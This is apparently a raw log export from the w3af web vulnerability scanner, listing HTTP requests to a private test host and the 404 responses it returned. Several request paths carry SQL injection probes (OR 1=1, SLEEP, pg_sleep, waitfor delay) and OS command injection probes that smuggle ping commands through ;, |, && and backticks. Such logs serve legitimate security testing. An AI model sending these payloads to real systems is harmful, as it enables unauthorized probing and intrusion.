                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="849">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12+OR+12%3D12+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="854">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="860">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/lq5nc%3C%2F-%3Elq5nc%2F%2Alq5nc%22lq5nclq5nc%27lq5nclq5nc%60lq5nclq5nc+%3D HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="861">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="862">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12+AND+12%3D13+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="864">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/FNNl0x0r HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="892">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="893">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="914">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="921">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="936">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="939">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="952">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="955">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="968">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="969">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="984">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="986">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1000">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1002">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
